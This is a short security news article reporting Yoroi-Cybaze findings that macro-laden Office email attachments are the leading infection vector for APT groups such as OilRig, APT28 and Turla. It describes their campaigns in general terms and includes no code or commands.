skip to Main Content

Weaponized emails are top APTs infection vector in today malware landscape

Weaponized Emails Are Top APTs Infection Vector In Today Malware Landscape

Yoroi-Cybaze: The top cybercrime and state-sponsored hackers infection vector in today malware landscape are the weaponized Microsoft Office documents delivered via email

The top cybercrime and state-sponsored hackers infection vector in today malware landscape are the weaponized Microsoft Office documents delivered via email. The second is the abusing of Microsoft DDE protocol with CVE-2017-11882. It has been revealed by Yoroi-Cybaze cyber security experts, who analyzed some samples of the last cyber attacks with this technique. The reason of this cybercrime “love” for the weaponized email is simple. Very often, macro malware does not rely on most-expensive-to-deploy 0-day exploit, and could bypass end-point security solution (macro are often whitelisted in enterprise environment) due to extensive use of multi-layered obfuscation mainly in powershell, broadly speaking with a very low barrier-to-entry. Furthermore, APTs Office documents with macros rely on simple social engineering tricks to lure users to enable them. 

The cyber security experts: Several APTs today use spear-phishing mail with weaponized office document as an attachment

According to Yoroi, several APTs today  are using spear-phishing mail with weaponized office document as an attachment. Just to name few ones OilRIG APT have used BondUpdated in a campaign, discovered by FireEy. In 2017 it targeted a different Middle Eastern governmental organization with a malicious VBA macro that download a 2-stage powershell. Similar vector was used in recents APT28 campaign targeting individuals with a specific interest in the CyCon US cybersecurity conference organized by the NATO Cooperative Cyber Defence Centre of Excellence (CCDCOE). The attackers didn’t use any zero-day vulnerabilities in this campaign, instead, they relied on weaponized Office documents containing VBA scripts used to deliver a new variant of Seduploader. Also TURLA APT use weaponized document in their recent campaigns to deliver KopiLuwak with heavily obfuscated Javascript payload. This sample show a high level of obfuscation to defeat AV and does not use any exploit.

Back To Top